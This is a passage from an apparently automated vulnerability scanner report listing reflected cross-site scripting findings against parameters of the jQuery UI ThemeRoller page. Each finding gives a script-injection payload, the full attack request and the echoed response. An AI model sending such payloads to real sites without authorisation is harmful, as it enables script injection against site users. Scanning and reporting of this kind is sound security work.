5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png7aed3"><script>alert(1)</script>16a6f61d3ed&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefaul
...[SNIP]...

2.20. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad7ec"><script>alert(1)</script>b82979b1cc1 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.pngad7ec"><script>alert(1)</script>b82979b1cc1&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120076

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.pngad7ec"><script>alert(1)</script>b82979b1cc1&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&ic
...[SNIP]...

2.21. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 565fc"><script>alert(1)</script>879531e615a was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png565fc"><script>alert(1)</script>879531e615a&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120076

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er/css/parseTheme.css.php?ctl=themeroller&ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png565fc"><script>alert(1)</script>879531e615a&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcConte
...[SNIP]...

2.22. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae9a4"><script>alert(1)</script>9e541edfd19 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.pngae9a4"><script>alert(1)</script>9e541edfd19&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120076

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.pngae9a4"><script>alert(1)</script>9e541edfd19&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&
...[SNIP]...

2.23. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83064"><script>alert(1)</script>bbcc468f88a was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f883064"><script>alert(1)</script>bbcc468f88a&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f883064"><script>alert(1)</script>bbcc468f88a&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9
...[SNIP]...

2.24. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f81"><script>alert(1)</script>124df26cb1d was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f868f81"><script>alert(1)</script>124df26cb1d&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f868f81"><script>alert(1)</script>124df26cb1d&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextur
...[SNIP]...

2.25. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff6ca"><script>alert(1)</script>2bbd96a6844 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448daeff6ca"><script>alert(1)</script>2bbd96a6844&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448daeff6ca"><script>alert(1)</script>2bbd96a6844&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefaul
...[SNIP]...

2.26. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9df1d"><script>alert(1)</script>6f1db1042e4 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae9df1d"><script>alert(1)</script>6f1db1042e4&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae9df1d"><script>alert(1)</script>6f1db1042e4&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4
...[SNIP]...

2.27. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6604b"><script>alert(1)</script>0d361950f2c was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px6604b"><script>alert(1)</script>0d361950f2c&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px6604b"><script>alert(1)</script>0d361950f2c&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bg
...[SNIP]...

2.28. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 196eb"><script>alert(1)</script>7b85f786089 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000196eb"><script>alert(1)</script>7b85f786089&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000196eb"><script>alert(1)</script>7b85f786089&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover
...[SNIP]...

2.29. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

